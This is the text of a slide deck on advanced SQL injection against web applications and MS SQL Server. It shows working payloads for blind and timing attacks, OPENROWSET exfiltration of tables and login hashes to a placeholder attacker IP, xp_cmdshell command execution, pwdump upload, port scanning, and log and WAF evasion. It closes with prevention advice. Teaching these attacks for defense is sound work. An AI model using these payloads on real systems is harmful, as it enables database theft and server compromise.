3. Credit
Cesar Cerrudo – CTO, IOActive Labs
o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injecti
on.pdf
ModSecurity Team – Trustwave SpiderLabs
o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-
learned.html
Avi Douglen – OWASP Board Member, Israel
o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
4. SQL Injection Basics
• Dynamic construction of SQL queries
“SELECT * FROM table WHERE user = '“ + uname + “' AND pwd = '” + pword + “'”
• Unsanitized user input
uname = ' or 1=1-- => SELECT * FROM table WHERE user = ' ' or 1=1-- ' AND pwd
=''
• Excessive permission
o Web services running as privileged user with db_owner rights
o Connecting to database using sa, dbo, or sysadmin accounts
o Lax file system permissions
5.
6.
7.
8.
9. Advance SQLi Techniques
• Blind SQL Injection
• Data Exfiltration
• Privilege Escalation
• Command Execution
• Uploading Files
• Internal DB Server Exploration
• Port Scanning
• Firewall Evasion
• Log Evasion
• WAF Evasion
11. Blind SQL Injection
• Differential Analysis
Example:
http://www.someforum.com/posts.php?id=2
SELECT author, title, body FROM posts WHERE ID = 2
http://www.someforum.com/posts.php?id=2 and 1=2
SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
http://www.someforum.com/posts.php?id=2 and 1=1
SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
12. Blind SQL Injection (cont.)
• Database Management System Fingerprinting
o System Functions
• MS SQL Server = getdate()
• MySQL = now()
• Oracle = sysdate()
• Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
o String Concatenation
• MS SQL Server = +
• MySQL = +, CONCAT()
• Oracle = ||, CONCAT()
• Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
o Query Chaining
• MS SQL Server, MySQL = allows chaining with semicolon
• Oracle = does NOT allow chaining with semicolon
• Example: http://www.someforum.com/posts.php?id=2; commit --
13. Blind SQL Injection (cont.)
• Timing Attacks
o Adding delay
• SQL Server = WAIT FOR DELAY '0:0:10‘
• MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null)
• PostgreSQL = pg_sleep(10)
• Oracle = Union with query that contains a lot of results
o SELECT IF(condition, true, false)
Example:
…1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by
10 seconds')),null) FROM users WHERE userid = 1;
15. Linked and Remote Servers
• OPENROWSET
Example:
SELECT * FROM OPENROWSET( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;'
'SELECT * FROM table' )
• OPENDATASOURCE
Example:
SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )
.DatabaseName.dbo.TableName
16. Data Exfiltration
• Remote server INSERT
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM table2
17. Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM master.dbo.sysdatabases
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysobjects ')
SELECT * FROM databasename.dbo.sysobjects
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _syscolumns')
SELECT * FROM databasename.dbo.syscolumns
18. Data Exfiltration (cont.)
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table1')
SELECT * FROM databasename..table1
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM table2')
SELECT * FROM databasename..table2
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
‘SELECT * FROM _sysxlogins')
SELECT * FROM databasename.dbo.sysxlogins
19. Privilege Escalation
• Known vulnerabilities
Example:
SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
• Often not required
o Connection strings using SA, dbo, sysadmin
o Web service context
20. Command Execution
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'
21. Uploading Files
On attacker’s server…
1. CREATE TABLE AttackerTable (data text)
2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
On victim’s server…
3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa
-Ppwn3d'
4. EXEC xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServerClientConnectTo','AttackersAlias','REG_SZ'
,'DBMSSOCN,AttackersIP,80'
5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -
Usa -Ppwn3d'
23. Internal DB Server Exploration
• Linked and Remote Servers
1. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM master.dbo.sysservers
2. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysservers')
SELECT * FROM linkedserver1.master.dbo.sysservers
3. INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
'SELECT * FROM _sysdatabases')
SELECT * FROM linkedserver1.master.dbo.sysdatabases
4. Rinse and repeat…
24. Port Scanning
Example:
SELECT * FROM OPENROWSET('SQLOLEDB',
'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
'SELECT * FROM table')
26. Firewall Evasion
• Use port 80 for outbound
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
'SELECT * FROM table1')
SELECT * FROM table2
27. Log Evasion
• Inject using POST parameters
• Long HTTP requests
o IIS truncates requests longer than 4097 characters
o Sun-One Application Server truncates at 4092 characters
Example:
http://www.someforum.com/posts.php?param=<4097 x ‘a’>&id=2 or 1=1--
28. WAF Evasion
• Comments
o # = single line comment
o -- = single line comment
o /* */ = inline, multi-line comment
o /*! */ = MySQL-specific inline, multi-line comment
Example:
http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
• New line
o %0D%0A = URL-encoded newline
o %0B = URL-encoded vertical separator
Example:
http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
29. WAF Evasion (cont.)
• Character Encoding
o Unicode (U+02BC = ʼ)
o CHAR()
o Hexadecimal
o URL-encoding
o Double Encoding
Example:
Double Encoding:
URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION
SEL%252f%252a%252a%252fECT * FROM…
WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION
SEL%2f%2a%252a%2fECT * FROM…
Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
30. WAF Evasion (cont.)
• Concatenation
o EXEC()
o Split/Join
o Special Characters (i.e. ‘*‘, ‘+’, ‘%’, etc.)
Example:
Split/Join:
URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
WAF = id=SELECT name
id=password FROM users
ASP/ASP.Net = id=SELECT name,password FROM users
Special Characters:
URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
WAF = id=SEL%ECT name,password FR%OM users
ASP/ASP.Net = id=SELECT name,password FROM users
33. SQLi Prevention
• Sanitize User Input
o Normalize Input
o Whitelists
o Built-in Functions
o Regular Expressions
o Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)
• Prepared Statements/Parameterized Queries
• Stored Procedures
• Accounts with Least Privilege
• Enable DisallowAdhocAccess registry setting for MS SQL Server
• Perform Self Assessments
• Use a Web Application Firewall
• Filter Outbound Traffic at Firewall